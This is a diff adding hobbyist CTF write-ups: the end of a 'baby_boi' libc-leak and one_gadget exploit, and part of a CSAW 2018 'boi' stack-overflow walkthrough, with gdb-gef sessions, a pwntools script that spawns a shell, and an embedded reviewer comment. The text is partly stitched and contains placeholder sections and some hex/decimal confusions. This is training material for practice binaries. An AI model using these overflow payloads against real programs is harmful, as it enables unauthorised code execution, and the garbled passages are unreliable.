+ :: Running post-transaction hooks...
+ (1/1) Arming ConditionNeedsUpdate...
+
+ [ 192.168.0.18/24 ] [ /dev/pts/9 ] [~]
+ → gem install one_gadget
+ Fetching one_gadget-1.7.4.gem
+ Fetching bindata-2.4.8.gem
+ Fetching elftools-1.1.3.gem
+ WARNING: You don't have /home/nothing/.local/share/gem/ruby/2.7.0/bin in your PATH,
+ gem executables will not run.
+ Successfully installed bindata-2.4.8
+ Successfully installed elftools-1.1.3
+ Successfully installed one_gadget-1.7.4
+ 3 gems installed
+
+
+
+Here for some reason the binary to run one_gadget isn't in my $PATH so i have to make a symlink to it:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/19 ] [~]
+ → sudo updatedb;locate one_gadget | grep 'gadget$'
+ /home/nothing/.local/share/gem/ruby/2.7.0/bin/one_gadget
+ /home/nothing/.local/share/gem/ruby/2.7.0/gems/one_gadget-1.7.4/bin/one_gadget
+ /home/nothing/.local/share/gem/ruby/2.7.0/gems/one_gadget-1.7.4/lib/one_gadget
+
+ [ 192.168.0.18/24 ] [ /dev/pts/19 ] [~]
+ → /home/nothing/.local/share/gem/ruby/2.7.0/bin/one_gadget
+ Usage: one_gadget [options]
+ -b, --build-id BuildID BuildID[sha1] of libc.
+ -f, --[no-]force-file Force search gadgets in file instead of build id first.
+ -l, --level OUTPUT_LEVEL The output level.
+ OneGadget automatically selects gadgets with higher successful probability.
+ Increase this level to ask OneGadget show more gadgets it found.
+ Default: 0
+ -n, --near FUNCTIONS/FILE Order gadgets by their distance to the given functions or to the GOT functions of the given file.
+ -r, --[no-]raw Output gadgets offset only, split with one space.
+ -s, --script exploit-script Run exploit script with all possible gadgets.
+ The script will be run as 'exploit-script $offset'.
+ --info BuildID Show version information given BuildID.
+ --base BASE_ADDRESS The base address of libc.
+ Default: 0
+ --version Current gem version.
+
+ [ 192.168.0.18/24 ] [ /dev/pts/21 ] [~]
+ → echo $PATH
+ /usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/usr/lib/jvm/default/bin:/usr/bin/site_perl:/usr/bin/vendor_perl:/usr/bin/core_perl:/var/lib/snapd/snap/bin
+
+ [ 192.168.0.18/24 ] [ /dev/pts/19 ] [~]
+ → sudo ln -s /home/nothing/.local/share/gem/ruby/2.7.0/bin/one_gadget /usr/local/bin/one_gadget
+
+ [ 192.168.0.18/24 ] [ /dev/pts/19 ] [~]
+ → zsh
+
+ [ 192.168.0.18/24 ] [ /dev/pts/19 ] [~]
+ → one_gadget
+ Usage: one_gadget [options]
+ -b, --build-id BuildID BuildID[sha1] of libc.
+ -f, --[no-]force-file Force search gadgets in file instead of build id first.
+ -l, --level OUTPUT_LEVEL The output level.
+ OneGadget automatically selects gadgets with higher successful probability.
+ Increase this level to ask OneGadget show more gadgets it found.
+ Default: 0
+ -n, --near FUNCTIONS/FILE Order gadgets by their distance to the given functions or to the GOT functions of the given file.
+ -r, --[no-]raw Output gadgets offset only, split with one space.
+ -s, --script exploit-script Run exploit script with all possible gadgets.
+ The script will be run as 'exploit-script $offset'.
+ --info BuildID Show version information given BuildID.
+ --base BASE_ADDRESS The base address of libc.
+ Default: 0
+ --version Current gem version.
+
+
+
+
+Now that's done, let's run one_gadget on the libc library:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → one_gadget libc-2.27.so
+ 0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
+ constraints:
+ rsp & 0xf == 0
+ rcx == NULL
+
+ 0x4f322 execve("/bin/sh", rsp+0x40, environ)
+ constraints:
+ [rsp+0x40] == NULL
+
+ 0x10a38c execve("/bin/sh", rsp+0x70, environ)
+ constraints:
+ [rsp+0x70] == NULL
+
+
+
+So here we see that we can leverage the libc infoleak with the printf statement to the libc printf which we know the libc version, we know the address space of the libc. For which onegadget to pick, it's usually trial and error to see what conditions will work. So let's make our exploit as follows:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/2 ] [binexp/2/bboi]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ # Establish the target
+ target = process('./baby_boi', env={"LD_PRELOAD":"./libc-2.27.so"})
+ libc = ELF('libc-2.27.so')
+
+ print(target.recvuntil("ere I am: "))
+
+ # Scan in the infoleak
+ leak = target.recvline()
+ leak = leak.strip(b"\n")
+
+ base = int(leak, 16) - libc.symbols['printf']
+
+ print("wooo:" + hex(base))
+
+ # Calculate oneshot gadget
+ oneshot = base + 0x4f322
+
+ payload = b""
+ payload += b"\x00"*0x28 # Offset to oneshot gadget
+ payload += p64(oneshot) # Oneshot gadget
+
+ # Send the payload
+ target.sendline(payload)
+
+ target.interactive()
+
+
+
+Now execute it and we see the following:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/1 ] [binexp/2/bboi]
+ → python3 exploit.py
+ [+] Starting local process './baby_boi': pid 540529
+ [*] '/home/nothing/binexp/2/bboi/libc-2.27.so'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+ Hello!
+ Here I am:
+ wooo:0x7fedeb22e012
+ [*] Switching to interactive mode
+ $ cat flag.txt
+ flag{baby_boi_dodooo_doo_doo_dooo}
+
+
+And that's it! we have been able to spawn a shell and print out the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
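Review bot: the libc base printed in the run, `wooo:0x7fedeb22e012`, is not page-aligned; `base = leak - libc.symbols['printf']` must end in 000 for a correct leak, so this value cannot be the base that produced the shell, and `oneshot = base + 0x4f322` computed from it would land 0x12 bytes off the gadget. Worth checking before publishing: that the leaked `printf` really comes from the preloaded libc-2.27.so and not the host libc, and that `leak` is exactly the hex address (print `hex(int(leak, 16))` and add `assert base & 0xfff == 0` right after the subtraction). Related caveat: running a foreign libc-2.27.so under the host's ld.so via `LD_PRELOAD` is fragile, which the `Inconsistency detected by ld.so` assertion from executing `./libc-2.27.so` already demonstrates; patching the binary to use the matching loader (patchelf or pwninit) is the reliable route, and the glibc version can be read with `strings libc-2.27.so | grep 'GNU C Library'` instead of executing the library. Also: the two `#include` lines in the quoted baby_boi.c lost their header names (the angle-bracketed names were stripped in conversion) and should be restored; `b"\x00"*0x28` deserves a comment that the offset is the 32-byte `buf` plus 8 bytes of saved rbp; "lekas some memorya ddress" and "mentionned" are typos; and the trailing "## Title" / "text" / "` ![]()" sections are template placeholders.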
diff --git a/2/boi.md b/2/boi.md
new file mode 100644
index 0000000..68c6451
--- /dev/null
+++ b/2/boi.md
@@ -0,0 +1,727 @@
+# CSAW 2018 Quals Boi
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/csaw18_boi/boi
+ --2021-02-22 21:57:40-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/csaw18_boi/boi
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/csaw18_boi/boi [following]
+ --2021-02-22 21:57:41-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/csaw18_boi/boi
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.111.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 8792 (8.6K) [application/octet-stream]
+ Saving to: ‘boi’
+
+ boi 100%[===============================================================================>] 8.59K --.-KB/s in 0s
+
+ 2021-02-22 21:57:41 (31.4 MB/s) - ‘boi’ saved [8792/8792]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → file boi
+ boi: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1537584f3b2381e1b575a67cba5fbb87878f9711, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → chmod +x boi
+
+
+
+` ![]()
+
+## Solution
+
+first things first, let's execute the binary to see what it does:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → ./boi
+ Are you a big boiiiii??
+ yes
+ Tue 23 Feb 2021 08:53:13 AM CET
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → ./boi
+ Are you a big boiiiii??
+ no
+ Tue 23 Feb 2021 08:53:17 AM CET
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → date
+ Tue 23 Feb 2021 08:53:22 AM CET
+
+
+it seems the binary checks for our input, and then executes a command, in this case it's 'date' let's use pwn to check the security of that binary:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → pwn checksec boi
+ [*] '/home/nothing/binexp/2/boi'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+
+here we see that this is a 64bit binary with a Stack Canary, and a non-executable stack (which are 2 binary mitigations). Let's take a look at it with ghidra:
+
+
+
+which gives us the following code for the main function:
+
+
+ undefined8 main(void)
+
+ {
+ long in_FS_OFFSET;
+ undefined8 local_38;
+ undefined8 local_30;
+ undefined4 local_28;
+ int iStack36;
+ undefined4 local_20;
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ local_38 = 0;
+ local_30 = 0;
+ local_20 = 0;
+ local_28 = 0;
+ iStack36 = -0x21524111;
+ puts("Are you a big boiiiii??");
+ read(0,&local;_38,0x18);
+ if (iStack36 == -0x350c4512) {
+ run_cmd("/bin/bash");
+ }
+ else {
+ run_cmd("/bin/date");
+ }
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return 0;
+ }
+
+
+
+Now in this main function, we see that our text input gets put into the local_38 variable, however there is something else here, there is an if statement, that wants the iStack36 value to be equal to a certain hexadecimal value. if it is not equal to that hex value, it will print out the date like we saw earlier, if it is actually the correct hex value, it will run /bin/bash. The important thing to note here is that the binary scans for 18 bytes of our data, or 18 ascii characters.
+
+Now if we look at what our iStack value is declared as we get the following:
+
+
+ iStack36 = -0x21524111;
+
+
+
+ 0040067e c7 45 e4 MOV dword ptr [RBP + local_28+0x4],0xdeadbeef
+ ef be ad de
+
+
+
+and then later on when iStack36 gets compared the second value:
+
+
+ if (iStack36 == -0x350c4512) {
+ run_cmd("/bin/bash");
+ }
+
+
+ 004006a8 3d ee ba CMP EAX,0xcaf3baee
+ f3 ca
+ 004006ad 75 0c JNZ LAB_004006bb
+ 004006af bf 7c 07 MOV EDI=>s_/bin/bash_0040077c,s_/bin/bash_0040077c = "/bin/bash"
+ 40 00
+ 004006b4 e8 6d ff CALL run_cmd undefined run_cmd()
+ ff ff
+
+
+
+so, iStack36 first gets assignd the 0xdeadbeef value, and then it gets compared to 0xcaf3baee. Now the next step is to look at the stack layout in ghidra, you can click on any variable where they are declared:
+
+
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined main()
+ undefined AL:1
+ undefined8 Stack[-0x10]:8 local_10 XREF[2]: 00400659(W),
+ 004006ca(R)
+ undefined4 Stack[-0x20]:4 local_20 XREF[1]: 00400677(W)
+ undefined8 Stack[-0x28]:8 local_28 XREF[1,2]: 0040066f(W),
+ 0040067e(W),
+ 004006a5(R)
+ undefined8 Stack[-0x30]:8 local_30 XREF[1]: 00400667(W)
+ undefined8 Stack[-0x38]:8 local_38 XREF[2]: 0040065f(W),
+ 0040068f(*)
+ undefined4 Stack[-0x3c]:4 local_3c XREF[1]: 00400649(W)
+ undefined8 Stack[-0x48]:8 local_48 XREF[1]: 0040064c(W)
+ main XREF[5]: Entry Point(*),
+ _start:0040054d(*),
+ _start:0040054d(*), 004007b4,
+ 00400868(*)
+ 00400641 55 PUSH RBP
+
+
+
+Now according to ghidra, our input (local_38) is stored at offset -0x38 and we see that is stored at offset -0x28 this means that theres is a 0x10 byte difference between the 2 values.
+
+Since we can write 0x18 bytes or characters, that measn we can fill up the 0x10 byte difference and overwrite other values, most importantly the value being checked (iStack36). So let's take a look at it from gdb-gef :
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → gdb ./boi
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from ./boi...
+ (No debugging symbols found in ./boi)
+ gef➤
+
+
+
+Now from here, we set a breakpoint at *0x4006a5 because this is where
+
+
+
+
+ gef➤ b *0x4006a5
+ Breakpoint 1 at 0x4006a5
+
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/boi
+ Are you a big boiiiii??
+ yes
+
+
+Here we use b to set the breakpoint, and r to run the binary, put in our text, and we get this breakpoint output:
+
+
+ Breakpoint 1, 0x00000000004006a5 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x4
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edce8e → 0x5a77fffff0003d48 ("H="?)
+ $rdx : 0x18
+ $rsp : 0x00007fffffffe0f0 → 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi"
+ $rbp : 0x00007fffffffe130 → 0x00000000004006e0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fffffffe100 → 0x000000000a736579 ("yes\n"?)
+ $rdi : 0x0
+ $rip : 0x00000000004006a5 → mov eax, DWORD PTR [rbp-0x1c]
+ $r8 : 0x18
+ $r9 : 0x00007ffff7facbe0 → 0x00000000006026a0 → 0x0000000000000000
+ $r10 : 0xfffffffffffff28b
+ $r11 : 0x246
+ $r12 : 0x0000000000400530 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0f0│+0x0000: 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi" ← $rsp
+ 0x00007fffffffe0f8│+0x0008: 0x000000010040072d
+ 0x00007fffffffe100│+0x0010: 0x000000000a736579 ("yes\n"?) ← $rsi
+ 0x00007fffffffe108│+0x0018: 0x0000000000000000
+ 0x00007fffffffe110│+0x0020: 0xdeadbeef00000000
+ 0x00007fffffffe118│+0x0028: 0x0000000000000000
+ 0x00007fffffffe120│+0x0030: 0x00007fffffffe220 → 0x0000000000000001
+ 0x00007fffffffe128│+0x0038: 0xa4430c55074e2b00
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400698 mov rsi, rax
+ 0x40069b mov edi, 0x0
+ 0x4006a0 call 0x400500
+ ●→ 0x4006a5 mov eax, DWORD PTR [rbp-0x1c]
+ 0x4006a8 cmp eax, 0xcaf3baee
+ 0x4006ad jne 0x4006bb
+ 0x4006af mov edi, 0x40077c
+ 0x4006b4 call 0x400626
+ 0x4006b9 jmp 0x4006c5
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "boi", stopped 0x4006a5 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a5 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤search-pattern yes
+
+
+
+
+now the thing is we can't just search-pattern the yes word we used as input, we need something more specific, so let's redo it:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → gdb ./boi
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from ./boi...
+ (No debugging symbols found in ./boi)
+ gef➤ b *0x4006a5
+ Breakpoint 1 at 0x4006a5
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/boi
+ Are you a big boiiiii??
+ 11223344
+
+ Breakpoint 1, 0x00000000004006a5 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x9
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edce8e → 0x5a77fffff0003d48 ("H="?)
+ $rdx : 0x18
+ $rsp : 0x00007fffffffe0f0 → 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi"
+ $rbp : 0x00007fffffffe130 → 0x00000000004006e0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fffffffe100 → "11223344\n"
+ $rdi : 0x0
+ $rip : 0x00000000004006a5 → mov eax, DWORD PTR [rbp-0x1c]
+ $r8 : 0x18
+ $r9 : 0x00007ffff7facbe0 → 0x00000000006026a0 → 0x0000000000000000
+ $r10 : 0xfffffffffffff28b
+ $r11 : 0x246
+ $r12 : 0x0000000000400530 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0f0│+0x0000: 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi" ← $rsp
+ 0x00007fffffffe0f8│+0x0008: 0x000000010040072d
+ 0x00007fffffffe100│+0x0010: "11223344\n" ← $rsi
+ 0x00007fffffffe108│+0x0018: 0x000000000000000a
+ 0x00007fffffffe110│+0x0020: 0xdeadbeef00000000
+ 0x00007fffffffe118│+0x0028: 0x0000000000000000
+ 0x00007fffffffe120│+0x0030: 0x00007fffffffe220 → 0x0000000000000001
+ 0x00007fffffffe128│+0x0038: 0xd7f7b092c102bd00
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400698 mov rsi, rax
+ 0x40069b mov edi, 0x0
+ 0x4006a0 call 0x400500
+ ●→ 0x4006a5 mov eax, DWORD PTR [rbp-0x1c]
+ 0x4006a8 cmp eax, 0xcaf3baee
+ 0x4006ad jne 0x4006bb
+ 0x4006af mov edi, 0x40077c
+ 0x4006b4 call 0x400626
+ 0x4006b9 jmp 0x4006c5
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "boi", stopped 0x4006a5 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a5 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤ search-pattern 11223344
+ [+] Searching '11223344' in memory
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffe100 - 0x7fffffffe10a → "11223344\n"
+
+
+
+Now from here we used the input '11223344' and gdb managed to find where it was located, so let's get more info on the **0x7fffffffe100** adress:
+
+
+ gef➤ x/10g 0x7fffffffe100
+ 0x7fffffffe100: 0x3434333332323131 0xa
+
+ **0x7fffffffe110: 0xdeadbeef00000000 0x0**
+
+ 0x7fffffffe120: 0x7fffffffe220 0xd7f7b092c102bd00
+ 0x7fffffffe130: 0x4006e0 0x7ffff7e14d0a
+ 0x7fffffffe140: 0x7fffffffe228 0x100000000
+
+
+From that output you can see the 0xdeadbeef value appearing at the 10 bytes offset we mentionned earlier.
+
+
+ 0040067e c7 45 e4 MOV dword ptr [RBP + local_28+0x4],0xdeadbeef
+ ef be ad de
+
+
+
+Now from here we will use python to create a specific payload, since we know that our input 11223344 is 10 bytes away, we will give the input of 10 zeroes, +p32(0xcaf3baee). We need the hex address to be in 'least endian' (least significant byte first) so this means we will write caf3baee in reverse like this : ee ba f3 ca. That is because this is an ELF binary, we saw it at the beginning of this writeup, and because of how the elf will read in the data, so we have to pack it in the correct order to be read properly:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → python -c 'print "0"*0x10 + "\xee\xba\xf3\xca"' > input
+
+
+
+now here you see that we create a file called 'input' that has 10 bytes worth of 0 characters, so essentially we have 10 zero characters and then afterwards we have the caf3baee hex value written in reverse, or in 'least endian'. We will use this input to feed into our binary file, and then we will see if we successfully managed to overwrite the data we wanted:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → gdb ./boi
+
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from ./boi...
+ (No debugging symbols found in ./boi)
+
+ gef➤ b *0x4006a5
+ Breakpoint 1 at 0x4006a5
+
+ gef➤ r < input
+ Starting program: /home/nothing/binexp/2/boi < input
+ Are you a big boiiiii??
+
+ Breakpoint 1, 0x00000000004006a5 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x15
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edce8e → 0x5a77fffff0003d48 ("H="?)
+ $rdx : 0x18
+ $rsp : 0x00007fffffffe0f0 → 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi"
+ $rbp : 0x00007fffffffe130 → 0x00000000004006e0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fffffffe100 → 0x3030303030303030 ("00000000"?)
+ $rdi : 0x0
+ $rip : 0x00000000004006a5 → mov eax, DWORD PTR [rbp-0x1c]
+ $r8 : 0x18
+ $r9 : 0x00007ffff7facbe0 → 0x00000000006026a0 → 0x0000000000000000
+ $r10 : 0xfffffffffffff28b
+ $r11 : 0x246
+ $r12 : 0x0000000000400530 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0f0│+0x0000: 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi" ← $rsp
+ 0x00007fffffffe0f8│+0x0008: 0x000000010040072d
+ 0x00007fffffffe100│+0x0010: 0x3030303030303030 ← $rsi
+ 0x00007fffffffe108│+0x0018: 0x3030303030303030
+ 0x00007fffffffe110│+0x0020: 0xdeadbe0acaf3baee
+ 0x00007fffffffe118│+0x0028: 0x0000000000000000
+ 0x00007fffffffe120│+0x0030: 0x00007fffffffe220 → 0x0000000000000001
+ 0x00007fffffffe128│+0x0038: 0xeea3ebadbb735f00
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400698 mov rsi, rax
+ 0x40069b mov edi, 0x0
+ 0x4006a0 call 0x400500
+ ●→ 0x4006a5 mov eax, DWORD PTR [rbp-0x1c]
+ 0x4006a8 cmp eax, 0xcaf3baee
+ 0x4006ad jne 0x4006bb
+ 0x4006af mov edi, 0x40077c
+ 0x4006b4 call 0x400626
+ 0x4006b9 jmp 0x4006c5
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "boi", stopped 0x4006a5 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4006a5 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+
+ gef➤ search-pattern 0000000000
+ [+] Searching '0000000000' in memory
+ [+] In '/usr/lib/x86_64-linux-gnu/libc-2.31.so'(0x7ffff7f5e000-0x7ffff7fa8000), permission=r--
+ 0x7ffff7f7fd50 - 0x7ffff7f7fd60 → "0000000000000000"
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffe100 - 0x7fffffffe10a → "0000000000[...]"
+
+ gef➤ x/10g 0x7fffffffe100
+ 0x7fffffffe100: 0x3030303030303030 0x3030303030303030
+ 0x7fffffffe110: 0xdeadbe0acaf3baee 0x0
+ 0x7fffffffe120: 0x7fffffffe220 0xeea3ebadbb735f00
+ 0x7fffffffe130: 0x4006e0 0x7ffff7e14d0a
+ 0x7fffffffe140: 0x7fffffffe228 0x100000000
+
+
+
+
+Here we can see at address 0x7fffffffe110 that the previous value of 0xdeadbeef got partially overwritten by our values caf3baee, with an offset of 8 hexadecimals, and for some reason we need to adjust the payload with only 4 hexadimals (from 10 to 14):
+
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [~/binexp/2]
+ → python -c 'print "0"*0x10 + "\xee\xba\xf3\xca"'
+ 0000000000000000
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [~/binexp/2]
+ → python -c 'print "0"*0x14 + "\xee\xba\xf3\xca"'
+ 00000000000000000000
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [~/binexp/2]
+ → python -c 'print "0"*0x14 + "\xee\xba\xf3\xca"' > input
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/2]
+ → gdb ./boi
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from ./boi...
+ (No debugging symbols found in ./boi)
+ gef➤ b *0x4006a5
+ Breakpoint 1 at 0x4006a5
+ gef➤ r < input
+ Starting program: /home/nothing/binexp/2/boi < input
+ Are you a big boiiiii??
+
+ Breakpoint 1, 0x00000000004006a5 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x18
+ $rbx : 0x0
+ $rcx : 0x00007ffff7edce8e → 0x5a77fffff0003d48 ("H="?)
+ $rdx : 0x18
+ $rsp : 0x00007fffffffe0f0 → 0x00007fffffffe228 → 0x00007fffffffe500 → "/home/nothing/binexp/2/boi"
+ $rbp : 0x00007fffffffe130 → 0x00000000004006e0 → <__libc_csu_init+0> push r15
+ $rsi : 0x00007fffffffe100 → 0x3030303030303030 ("00000000"?)
+ $rdi : 0x0
+ $rip : 0x00000000004006a5 → mov eax, DWORD PTR [rbp-0x1c]
+ $r8 : 0x18
+ $r9 : 0x00007ffff7facbe0 → 0x00000000006026a0 → 0x0000000000000000
+ $r10 : 0xfffffffffffff28b
+ $r11 : 0x246
+ $r12 : 0x0000000000400530 → <_start+0> xor ebp, ebp
